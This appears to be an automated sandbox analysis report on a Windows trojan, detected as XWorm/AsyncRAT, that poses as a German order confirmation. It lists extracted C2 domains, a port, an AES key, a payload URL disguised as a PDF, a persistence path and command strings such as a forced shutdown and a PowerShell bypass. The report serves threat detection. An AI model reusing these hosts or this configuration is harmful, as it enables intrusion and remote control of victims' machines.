Edit tour

Windows Analysis Report
Bestellbest#U00e4tigung.exe

Overview

General Information

Sample name:	Bestellbest#U00e4tigung.exe renamed because original name is a hash value
Original sample name:	Bestellbesttigung.exe
Analysis ID:	1628932
MD5:	9be63a33ce71dbab9292a999480253fb
SHA1:	cde46a95a7aeed46d9ecb3315e71bcfe2d82036e
SHA256:	fae38184c5ffe7bc017485d6cd3340feb5ac7e67960e7e9599fa1901367dfce6
Tags:	exeuser-threatcat_ch
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Downloads files with wrong headers with respect to MIME Content-Type

Drops VBS files to the startup folder

Joe Sandbox ML detected suspicious sample

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Bestellbest#U00e4tigung.exe (PID: 5732 cmdline: "C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe" MD5: 9BE63A33CE71DBAB9292A999480253FB)

Bestellbest#U00e4tigung.exe (PID: 5532 cmdline: "C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe" MD5: 9BE63A33CE71DBAB9292A999480253FB)

WerFault.exe (PID: 6500 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["officialtrmmy.ydns.eu", "sdremm.ydns.eu", "bich23.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2300569085.0000000005C00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c5b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6cf8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e0d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6acd:$cnc4: POST / HTTP/1.1
00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc5758:$s8: Win32_ComputerSystem 0x11adaf:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11ae4c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11af61:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11ac21:$cnc4: POST / HTTP/1.1
00000000.00000002.2288152388.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2288152388.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1dcd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1dd70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1de85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1db45:$cnc4: POST / HTTP/1.1
Process Memory Space: Bestellbest#U00e4tigung.exe PID: 5732	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Bestellbest#U00e4tigung.exe PID: 5732	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: Bestellbest#U00e4tigung.exe PID: 5732	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Bestellbest#U00e4tigung.exe PID: 5532	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.Bestellbest#U00e4tigung.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.2.Bestellbest#U00e4tigung.exe.400000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x6707:$str05: Select * from AntivirusProduct 0x6905:$str06: PCRestart 0x6919:$str07: shutdown.exe /f /r /t 0 0x69cb:$str08: StopReport 0x69a1:$str09: StopDDos 0x6aa3:$str10: sendPlugin 0x6b23:$str11: OfflineKeylogger Not Enabled 0x6c89:$str12: -ExecutionPolicy Bypass -File " 0x6db2:$str13: Content-length: 5235
3.2.Bestellbest#U00e4tigung.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e5b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6ef8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x700d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6ccd:$cnc4: POST / HTTP/1.1
0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3be5:$str01: $VB$Local_Port 0x3bd6:$str02: $VB$Local_Host 0x3ee6:$str03: get_Jpeg 0x388e:$str04: get_ServicePack 0x4907:$str05: Select * from AntivirusProduct 0x4b05:$str06: PCRestart 0x4b19:$str07: shutdown.exe /f /r /t 0 0x4bcb:$str08: StopReport 0x4ba1:$str09: StopDDos 0x4ca3:$str10: sendPlugin 0x4d23:$str11: OfflineKeylogger Not Enabled 0x4e89:$str12: -ExecutionPolicy Bypass -File " 0x4fb2:$str13: Content-length: 5235
0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x505b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x50f8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x520d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4ecd:$cnc4: POST / HTTP/1.1
0.2.Bestellbest#U00e4tigung.exe.5c00000.8.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x6707:$str05: Select * from AntivirusProduct 0x6905:$str06: PCRestart 0x6919:$str07: shutdown.exe /f /r /t 0 0x69cb:$str08: StopReport 0x69a1:$str09: StopDDos 0x6aa3:$str10: sendPlugin 0x6b23:$str11: OfflineKeylogger Not Enabled 0x6c89:$str12: -ExecutionPolicy Bypass -File " 0x6db2:$str13: Content-length: 5235
0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e5b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6ef8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x700d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6ccd:$cnc4: POST / HTTP/1.1
0.2.Bestellbest#U00e4tigung.exe.5c00000.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 6 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe, ProcessId: 5732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["officialtrmmy.ydns.eu", "sdremm.ydns.eu", "bich23.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Current.exe

ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Source: Bestellbest#U00e4tigung.exe

ReversingLabs: Detection: 23%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: officialtrmmy.ydns.eu,sdremm.ydns.eu,bich23.ydns.eu
Source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 4050
Source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: DAVID
Source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: USB.exe

Source: Bestellbest#U00e4tigung.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Bestellbest#U00e4tigung.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.pdb source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308780855.0000000006560000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: HP<o,C:\Windows\System.pdb<@ source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377311204.0000000000957000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbw source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308780855.0000000006560000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb,p# source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000C13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Bestellbest#U00e4tigung.PDB^ source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000C13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377311204.0000000000957000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\Bestellbest#U00e4tigung.PDB source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377311204.0000000000957000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 4x nop then jmp 05F563B9h	0_2_05F561C0
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 4x nop then jmp 05F563B9h	0_2_05F561B0
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 4x nop then jmp 05F55E26h	0_2_05F55A80
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 4x nop then jmp 05F55E26h	0_2_05F55A77
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 4x nop then jmp 0660C388h	0_2_0660C2C8
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 4x nop then jmp 0660C388h	0_2_0660C2D0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: officialtrmmy.ydns.eu
Source: Malware configuration extractor	URLs: sdremm.ydns.eu
Source: Malware configuration extractor	URLs: bich23.ydns.eu

Downloads files with wrong headers with respect to MIME Content-Type

Source: http

Bad PDF prefix: HTTP/1.1 200 OK Date: Tue, 04 Mar 2025 08:35:21 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 04 Mar 2025 06:13:15 GMT ETag: "fa608-62f7e2b168c7c" Accept-Ranges: bytes Content-Length: 1025544 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 50 76 e3 5a c2 59 1f a6 5a 4c d1 c8 7c 2f 07 96 22 a3 b0 1c 53 30 a6 ee da c0 d1 64 70 6a f6 cd d0 5a b1 2f 0d 43 4f bd 51 51 f5 1e 63 1d cb bf f1 fd 81 64 88 80 03 76 13 6b dc 07 d1 98 d3 3c 97 c1 a6 45 34 82 16 d2 5c d9 5d 7d b8 0b 3c b0 d2 20 e0 76 b9 66 e8 7e a3 c8 df 01 29 28 41 36 e2 f6 15 cf 46 ee 96 c2 cf b8 62 e5 64 1c 42 34 3f 5a 69 73 01 21 19 4e 21 34 68 c8 86 af 0b f0 94 ce a2 8f 54 32 4c 0d 6c 6c 20 3f 93 96 41 18 f4 49 22 a1 cb e3 9c 8f 65 58 77 e4 83 ec 37 33 90 17 2d 3a ca ca a6 d0 a7 45 d6 3c e3 47 c2 c9 cd d3 7a 5d c1 9e f3 5e 3e 8a 43 50 bb 32 1d d2 ad 0f 7e e9 8f 23 9c 45 33 05 e2 64 b7 cf cc 26 6f b5 ab 1e 9b 31 4c ff 96 57 ba 58 17 79 55 47 42 ef 46 5f 4a 32 d7 d2 38 3b 50 99 af f2 20 41 cd d9 e0 e1 06 ce 37 a0 d6 72 ba 25 d1 99 1e f9 e1 80 29 3c 59 34 b2 46 1f eb 6c bf 2a c5 fa 65 c8 64 18 16 00 2f 02 dd f3 8b 76 7b bf 22 9f db 46 64 41 3f 25 dc 0a f3 b6 ad 33 ca 01 e5 68 fd 96 09 6e 0f 88 0f bc f0 16 d2 c9 7a 02 46 85 95 68 a2 2f 2d c9 d1 37 98 8d 03 5d 40 95 f2 6a b4 37 bc 37 28 99 18 ea a1 06 bb fb 5a 3d 52 11 9b 14 e4 19 36 53 ee 3c 16 6e a8 bd 06 e2 1a a7 96 db 90 84 9e bc 83 75 8a 88 1b 44 28 ac 5d f4 58 56 43 96 66 14 6f f4 a7 1d cc ec fd 1c 07 a6 3c 31 16 ad b3 0d f1 99 0a bf dc db 5a fa ce ad fc e3 c5 2c 3d 05 c2 c8 64 74 76 14 56 43 1c 20 5a e6 46 00 0f 8f e4 03 80 d0 9d 51 f8 38 c7 db 0d f4 2f cf 48 80 75 ef 4e 9e ab 07 f8 00 3c fb 19 ad af e7 c2 6c 6c c0 8a b7 0b 4f 3e 9e 1a de 04 cf 73 60 98 bc 81 47 9a e9 9d a1 ee 2d ca e5 e4 6d ba 11 69 cb b5 0a 5f 90 93 62 a3 e6 7a 18 d6 86 92 69 5d 07 50 d5 ff 50 90 24 03 45 22 a6 0d f4 fc c3 32 8d df 3c 08 e9 df c2 db e2 5d fb e9 aa ab 88 b4 aa d0 13 df 57 f3 bc 9a 5b 15 06 ce 78 6c c6 9c 44 eb cc 70 0b b9 aa 22 f2 6f 8c 16 90 b2 3c 91 bf b3 e9 35 87 4a af 25 b6 ba 57 0e 55 e3 72 39 29 bb ad 2a 8e 13 dd 19 95 b5 49 5b b5 75 b3 34 8c fd 4e 92 e6 d6 76 ab 28 87 c3 52 61 2f 7a 22 2e 10 ce 6b b2 fe 89 a3 aa 42 fb 63 ff c1 2d e1 a1 e9 50 af ae 27 94 59 14 50 82 db 24 ea 2f 5f b1 91 f0 d2 32 79 26 84 8b e5 e2 af b4 ab 4c 92 75 d1 e3 c4 97 a8 ff ba 7b 01 fc 92 38 24 d1 c2 97 14 08 2b ea ad e4 5d 9e fb a6 8e 9c 00 9e cb 41 8b c2 04 0a 82 fb 9e 71 8e 2c ca d0 c5 41 1f f6 41 50 13 61 c8 39 d8 a7 66 9c 00 9f 58 95 3a bf 41 60 bd 70 75 8a 31 98 c0 46 ac 1f e2 3f ae f6 ec 5d 73 1b 8b 54 c4 77 1f e3 ae 0a 5b af d3 97 43 48 1b 05 9f 2c da f9 fa e3 af 6a 56 97 5d 2f d3 a7 71 2b 27 d9 08 ee 43 81 23 9a fb 26 75 1a 28 ae 39 94 09 29 ef 6c 2e 93 ee 3d 9e 5f 51 1b 13 dd 72 b6 4c a4 5b 76 9e e5 da 50 b9 5f a9 43 43 25 74 57 ee d3 1d 9a fe 1b b0 3b 10 ba 7a 86 6b f2 5b 0a 44 23 7d 0f 74 65 2d 3d 2d b0 8a 55 63 8e 5c 2e 87 da 5b e5 2c 90 56 50 d1 bc 9a 13 58 de 62 36 a9 92 8b 81 4b

Source: global traffic

HTTP traffic detected: GET /never/lookinto/it/panel/uploads/Rieukcp.pdf HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /never/lookinto/it/panel/uploads/Rieukcp.pdf HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: win32.ydns.eu

Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win32.ydns.eu
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win32.ydns.eu/never/lookinto/it/panel/uploads/Rieukcp.pdf
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.Bestellbest#U00e4tigung.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 3.2.Bestellbest#U00e4tigung.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2288152388.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_0660DC08 NtProtectVirtualMemory,		0_2_0660DC08
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_0660DC00 NtProtectVirtualMemory,		0_2_0660DC00

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_00CDF958	0_2_00CDF958
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_05F5B4F8	0_2_05F5B4F8
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_05F5B4E9	0_2_05F5B4E9
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_05F59880	0_2_05F59880
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_05F59870	0_2_05F59870
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_05F522F0	0_2_05F522F0
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_06605E80	0_2_06605E80
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_0660A758	0_2_0660A758
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_066030DB	0_2_066030DB
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_06605E72	0_2_06605E72
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_0660A748	0_2_0660A748
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_06604C28	0_2_06604C28
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_06604C18	0_2_06604C18
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_0660CCA0	0_2_0660CCA0
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_0660CC90	0_2_0660CC90
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_066AFB60	0_2_066AFB60
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_066AF898	0_2_066AF898
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_066AE2D8	0_2_066AE2D8
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_06690040	0_2_06690040
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_066AE850	0_2_066AE850
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_06690006	0_2_06690006
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 3_2_02800B93	3_2_02800B93

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 928

